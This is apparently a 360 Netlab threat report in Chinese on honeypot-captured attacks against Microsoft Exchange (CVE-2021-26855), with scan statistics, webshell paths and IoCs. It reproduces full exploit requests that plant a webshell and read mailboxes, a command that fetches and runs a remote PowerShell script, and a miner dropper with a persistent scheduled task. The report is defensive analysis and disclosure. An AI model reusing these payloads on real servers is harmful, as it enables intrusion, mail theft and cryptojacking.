背景介绍
2021年3月2号,微软披露了Microsoft Exchange服务器的远程代码执行漏洞[1]。
2021年3月3号开始,360网络安全研究院Anglerfish蜜罐开始模拟和部署Microsoft Exchange蜜罐插件,很快我们搜集到大量的漏洞检测数据,目前我们已经检测到攻击者植入Webshell,获取邮箱信息,甚至进行XMRig恶意挖矿(http://178.62.226.184/run.ps1
)的网络攻击行为。根据挖矿文件路径名特征,我们将该Miner命名为Tripleone。
2021年3月6号开始,ProjectDiscovery和微软CSS-Exchange项目相继披露了漏洞检测脚本[2][3]。
Microsoft Exchange服务器的远程代码执行漏洞利用步骤复杂,一般从PoC公布到黑色产业攻击者利用需要一定的时间,我们看到这个攻击现象已经开始了。
CVE-2021-26855 植入Webshell
POST /ecp/j2r3.js HTTP/1.1Host: {target}Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Content-Type: application/json; charset=utf-8Cookie: X-BEResource=Administrator@EXCHANGE01:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=bTEwQdC2fkijeS-2wvtAdCnAngle7rfishIlH4dgINcqO6mYA4bY-ATaZjT2ZzjTIil62g3Tg23.&a=~1942062522; ASP.NET_SessionId=00782f75-8b35-11eb-af5a-560002fbb132; msExchEcpCanary=bTEwQdC2fkijeS-2wvtAdCnAngle7rfishIlH4dgINcqO6mYA4bY-ATaZjT2ZzjTIil62g3Tg23.msExchLogonMailbox: S-1-5-20Content-Length: 381{"properties": {"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "FilePathName": "\\\\\\\\\\\\\\\\127.0.0.1\\\\\\\\c$\\\\\\\\Program Files\\\\\\\\Microsoft\\\\\\\\Exchange Server\\\\\\\\V15\\\\\\\\FrontEnd\\\\\\\\HttpProxy\\\\\\\\owa\\\\\\\\auth\\\\\\\\test1337.aspx"}}, "identity": {"DisplayName": "OAB (Default Web Site)", "__type": "Identity:ECP", "RawIdentity": "7280d03f-194a-4bf3-98a7-076e7728321d"}}
CVE-2021-26855 获取邮箱信息
POST //ecp/ssrf.js HTTP/1.1Host: {target}Connection: closeAccept-Encoding: gzipAccept: */*User-Agent: Hello-WorldContent-Type: text/xmlCookie: X-BEResource=IBM-EX01/EWS/Exchange.asmx?a=~1942062522;Content-Length: 756<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">Default admin@domain.tld
CVE-2021-26855 挖矿攻击
POST /owa/auth/test1337.aspx HTTP/1.1Host: {target}Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.25.1Content-Length: 211Content-Type: application/x-www-form-urlencodedcode=Response.Write%28new+ActiveXObject%28%22WScript.Shell%22%29.exec%28%22powershell+IEX+%28New-Object+Net.WebClient%29.DownloadString%28http%3A%2F%2F178.62.226.184%2Frun.ps1%29%22%29.StdOut.ReadAll%28%29%29%3B
攻击者通过http://178.62.226.184/run.ps1
文件植入XMRig挖矿程序,以下是攻击详情:
$ProcessActive = Get-Process javacpl -ErrorAction SilentlyContinueif($ProcessActive -eq $null){new-item c:\\\\temp\\\\111 -itemtype directory$WebClient = New-Object System.Net.WebClient$WebClient.DownloadFile("http://178.62.226.184/config.json","C:\\\\temp\\\\111\\\\config.json")$WebClient.DownloadFile("http://178.62.226.184/javacpl.exe","C:\\\\temp\\\\111\\\\javacpl.exe")$WebClient.DownloadFile("http://178.62.226.184/WinRing0x64.sys","C:\\\\temp\\\\111\\\\WinRing0x64.sys")Start-Process -Filepath "C:\\\\temp\\\\111\\\\javacpl.exe"$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-windowstyle hidden -executionpolicy bypass -noprofile IEX (New-Object Net.WebClient).DownloadString("http://178.62.226.184/run.ps1")"$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 3)Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "App2" -Description "Check"}else{Write-host "run"}
Anglerfish蜜罐数据视野
2021年3月6日开始,360网络安全研究院Anglerfish蜜罐系统监测到Microsoft Exchange漏洞(CVE-2021-26855)扫描,截至日前,扫描源IP地址地理位置分布如下:
通过对扫描端口分析发现,扫描目的端口主要是443端口(77.3%),其次是80端口(11.3%),如下图:
根据分析捕获的扫描流量,扫描源IP ASN(Autonomous System Numbers)主要是Linode, LLC、DiGiTALOCEAN-ASN和LeaseWeb Netherlands B.V.,占比50%以上,扫描整体趋势如下:
扫描源IP来自全球各个国家,其中美国占比最大,如下图:
对捕获的流量进行分析发现,Top 5的扫描IP占比所有扫描行为的50%,其中159.89.95.163占比达24%,暴露了该IP具有一定的组织性。
通过对攻击流量进行分析发现,攻击者已经能够成功利用该漏洞植入Webshell,详情如下图所示:
攻击者通过Webshell进一步实施恶意攻击操作,如植入XMRig挖矿程序,详情如下图所示:
部分扫描源IP rDNS SLD信息
我们通过简单分析Microsoft Exchange漏洞(CVE-2021-26855)扫描的扫描源IP对应的rDNS信息,可以看到一些组织信息。
Webshell 分析
我们监测到大量Webshell路径探测请求,其中大部分是安全厂商和研究机构的扫描行为。
已知Webshell路径如下所示:
GET /owa/auth/Current/scripts/premium/fexppw.aspx 2067GET /owa/auth/OutlookEN.aspx 1998GET /owa/auth/logg.aspx 1646GET /owa/auth/8Lw7tAhF9i1pJnRo.aspx 1637GET /owa/auth/a.aspx 1616GET /owa/auth/Current/themes/errorFS.aspx 1601GET /owa/auth/errorPage.aspx 1590GET /owa/auth/getpp.aspx 1556GET /owa/auth/default.aspx 1539GET /owa/auth/fatal-erro.aspx 1521GET /owa/auth/errorPages.aspx 1516GET /owa/auth/log.aspx 1503GET /owa/auth/shel90.aspx 1467GET /owa/auth/Err0r.aspx 1458GET /owa/auth/logout.aspx 1443GET /owa/auth/15.0.1347/themes/resources/exchange_create_css.aspx 1432GET /owa/auth/RedirSuiteServerProxy.aspx 1412GET /owa/auth/current/one1.aspx 1408GET /owa/auth/one.aspx 1309GET /owa/auth/Current/themes/resources/owafont_vo.aspx 1279GET /owa/auth/Current/app222.aspx 1216GET /owa/auth/15.0.847/themes/resources/hmask.aspx 1212GET /owa/auth/15.1.1913/themes/resources/View_Photos.aspx 1210GET /owa/auth/ErrorAA.aspx 1126GET /owa/auth/one1.aspx 1101GET /owa/auth/zntwv.aspx 1060GET /owa/auth/bob.aspx 1013GET /owa/auth/Current/themes/resources/owafont_vn.aspx 1009GET /owa/auth/shel2.aspx 1001GET /owa/auth/shel.aspx 1000GET /owa/auth/OutlookZH.aspx 990GET /owa/auth/Current/themes/resources/daxlz.aspx 988GET /owa/auth/authhead.aspx 981GET /owa/auth/15.1.1913/themes/resources/bg_gradient_login.aspx 965GET /owa/auth/web.aspx 422GET /owa/auth/shell.aspx 415GET /owa/auth/wanlin.aspx 410GET /owa/auth/xx.aspx 408GET /owa/auth/errorFF.aspx 403GET /owa/auth/shellex.aspx 402GET /owa/auth/errorEEE.aspx 402GET /owa/auth/web.config.aspx 401GET /owa/auth/t.aspx 400GET /owa/auth/errorEE.aspx 399GET /owa/auth/test.aspx 397GET /owa/auth/healthcheck.aspx 397GET /owa/auth/aspnet_client.aspx 395GET /owa/auth/help.aspx 393GET /owa/auth/error_page.aspx 392GET /owa/auth/27fib.aspx 390GET /owa/auth/document.aspx 388GET /owa/auth/b.aspx 386GET /owa/auth/aspnet_iisstart.aspx 385GET /owa/auth/errorFE.aspx 384GET /owa/auth/aspnettest.aspx 384GET /owa/auth/evilcorp.aspx 382GET /owa/auth/errorEW.aspx 382GET /owa/auth/aspnet_www.aspx 377GET /owa/auth/OutlookDA.aspx 265GET /owa/auth/expiredpassword.aspx 176GET /owa/auth/OutlookAR.aspx 158GET /owa/auth/logoff.aspx 153GET /owa/auth/OutlookES.aspx 151GET /owa/auth/OutlookIO.aspx 146GET /owa/auth/OutlookAS.aspx 145GET /owa/auth/OutlookFR.aspx 136GET /owa/auth/OutlookPL.aspx 133GET /owa/auth/OutlookSE.aspx 133GET /owa/auth/OutlookDE.aspx 128GET /owa/auth/OutlookIT.aspx 126GET /owa/auth/OutlookCN.aspx 112GET /owa/auth/seclogon.aspx 61GET /owa/auth/Current/themes/resources/system_io.aspx 57GET /owa/auth/6GIXZG.aspx 57GET /owa/auth/hmknq.aspx 54GET /owa/auth/Current/themes/resources/View_tools.aspx 53GET /owa/auth/15.1.225/scripts/premium/errorPE.aspx 53GET /owa/auth/Current/themes/resources/Ignrop.aspx 53GET /owa/auth/Current/themes/resources/OutlookQN.aspx 53GET /owa/auth/Current/themes/resources/errorFE.aspx 53GET /owa/auth/Current/AMNBJLXqoHTV.aspx 53GET /owa/auth/ErrorDef.aspx 51GET /owa/auth/DesktopShellExt.aspx 51GET /owa/auth/logerr.aspx 48GET /owa/auth/rlvgk.aspx 48GET /owa/auth/owaauth.aspx 48GET /owa/auth/pzbwl.aspx 48GET /owa/auth/CommonError.aspx 46GET /owa/auth/Current/themes/resources/logon.aspx 46GET /owa/auth/Current/layout.aspx 46GET /owa/auth/Current/themes/config1.aspx 46GET /owa/auth/errorcheck.aspx 46GET /owa/auth/ProximityService.aspx 45GET /owa/auth/iasads.aspx 45GET /owa/auth/15.1.2044/themes/resources/office365_ph.aspx 45GET /owa/auth/atlthunk.aspx 45GET /owa/auth/errorew.aspx 44GET /owa/auth/rwinsta.aspx 44GET /owa/auth/061a06908b.aspx 44GET /owa/auth/15.0.1497/themes/resources/error.aspx 44GET /owa/auth/Current/zJBxcBoI.aspx 44GET /owa/auth/frow.aspx 43GET /owa/auth/server.aspx 43GET /owa/auth/erroreww.aspx 43GET /owa/auth/fhsvc.aspx 43GET /owa/auth/Current/Exchanges.aspx 42GET /owa/auth/erroreee.aspx 42GET /owa/auth/online.aspx 42GET /owa/auth/outlooken.aspx 42GET /owa/auth/erroree.aspx 42GET /owa/auth/s.aspx 42GET /owa/auth/XblGameSave.aspx 42GET /owa/auth/errorpage.aspx 42GET /owa/auth/secauth1.aspx 42GET /owa/auth/secauth.aspx 42GET /owa/auth/session.aspx 42GET /owa/auth/8lw7tahf9i1pjnro.aspx 41GET /owa/auth/outlookfront.aspx 41GET /owa/auth/plorion.aspx 41GET /owa/auth/outlookru.aspx 41GET /owa/auth/proxylogon.aspx 41GET /owa/auth/error.aspx 41GET /owa/auth/qnx.aspx 41GET /owa/auth/ovfwHWjwWm.aspx 41GET /owa/auth/KBDBENE.aspx 40GET /owa/auth/letmeinplzs.aspx 40GET /owa/auth/OutlookUS.aspx 40GET /owa/auth/jhJ2zT9ouOfP6VnBcHg3.aspx 40GET /owa/auth/errorff.aspx 40GET /owa/auth/login.aspx 40GET /owa/auth/errorfff.aspx 40GET /owa/auth/ntprint.aspx 39GET /owa/auth/redirsuiteserverproxy.aspx 39GET /owa/auth/OutlookDN.aspx 38GET /owa/auth/errorpages.aspx 38GET /owa/auth/load.aspx 38GET /owa/auth/m0xbqRg1ranzvGD3jiXT.aspx 38GET /owa/auth/jOBJIfr92ERLmg1HcnF3.aspx 37GET /owa/auth/outlookjp.aspx 37GET /owa/auth/discover.aspx 37GET /owa/auth/xclkmcfldfi948398430fdjkfdkj.aspx 37GET /owa/auth/hUjwpeROcY7Fo4g8ETH3.aspx 36GET /owa/auth/multiup.aspx 35GET /owa/auth/supp0rt.aspx 35GET /owa/auth/HcDKNzBoha.aspx 35GET /owa/auth/sol.aspx 35GET /owa/auth/FR5Ha0D1dwfsqIUMhLCQ.aspx 34GET /owa/auth/signon.aspx 34GET /owa/auth/HUUPItrNpXvI.aspx 34GET /owa/auth/dbuj9.aspx 34GET /owa/auth/outlookzh.aspx 34GET /owa/auth/L2oXwTljs3GnMyHQV0KR.aspx 33GET /owa/auth/httpproxy.aspx 33GET /owa/auth/XboxNetApiSvc.aspx 33GET /owa/auth/signout.aspx 33GET /owa/auth/KrhHyDPwb70ct362JmLn.aspx 32GET /owa/auth/OutlookEN.US.aspx 32GET /owa/auth/system_web/log.aspx 31GET /owa/auth/tst1.aspx 31GET /owa/auth/OutlookUN.aspx 31GET /owa/auth/tpmvscmgrsvr.aspx 31GET /owa/auth/shelltest.aspx 30GET /owa/auth/aspx_client.aspx 30GET /owa/auth/iispage.aspx 30GET /owa/auth/aaa.aspx 30GET /owa/auth/aa.aspx 30GET /owa/auth/aspnet.aspx 28GET /owa/auth/tNLPge.aspx 28GET /owa/auth/VqEUaLjKpcWoNC7yPMlz.aspx 28GET /owa/auth/test1337.aspx 27GET /owa/auth/asas.aspx 27GET /owa/auth/test13037.aspx 27GET /owa/auth/aspnet_pages.aspx 26GET /owa/auth/ahihi.aspx 26GET /owa/auth/TimeoutLogout.aspx 26GET /owa/auth/ZI3uMczmPa5bwTYVpKsE.aspx 26GET /owa/auth/theme-gsx8ujzpicf0.aspx 24GET /owa/auth/default1.aspx 22GET /owa/auth/theme-vten8snn874b.aspx 21POST /owa/auth/test1337.aspx 9GET /owa/auth/OutlookJP.aspx 6POST /owa/auth/Current/themes/resources/OutlookQN.aspx 5GET /owa/auth/Logout.aspx 4GET /owa/auth/HttpProxy.aspx 4GET /owa/auth/Online.aspx 4GET /owa/auth/OutlookRU.aspx 4GET /owa/auth/MultiUp.aspx 2GET /owa/auth/checkerror635284.aspx 2GET /owa/auth/Discover.aspx 2GET /owa/auth/Current/themes/resources/lgnleft.aspx 2GET /owa/auth/WMSPDMOD.aspx 2POST /owa/auth/oauth2-client.aspx 2GET /owa/auth/1d61acae91.aspx 2POST /owa/auth/RedirSuiteServerProxy.aspx 1GET /owa/auth/lo.aspx 1GET /owa/auth/error404.aspx 1GET /owa/auth/current/themes/resources/error.aspx 1
Miscrosoft Exchange服务器分布
360 Quake网络空间测绘系统通过对全网资产测绘,发现Microsoft Exchange服务器共3,378,260条数据记录,其中有534,590个独立IP,具体分布如下图所示。
联系我们
感兴趣的读者,可以在 twitter 或者通过邮件netlab[at]360.cn联系我们。
IoC
IP:
178.62.226.184157.245.47.214
Miner Proxy:
159.65.206.137:3333
URL:
http://178.62.226.184/mini-reverse.ps1http://178.62.226.184/run.ps1http://178.62.226.184/config.jsonhttp://178.62.226.184/javacpl.exehttp://178.62.226.184/WinRing0x64.sys
MD5:
79e2c9953f452f777d55749f01e5f3b72d4d75e46f6de65fba2451da716863220fe28f557e9997cd2750ff3fa86a659e67f2d42e30f6239114feafc9ffd009d80c0195c48b6b8582fa6f6373032118da
声明:本文来自Netlab 三六零,版权归作者所有。文章内容仅代表作者独立观点,不代表士冗科技立场,转载目的在于传递更多信息。如有侵权,请联系 service@expshell.com。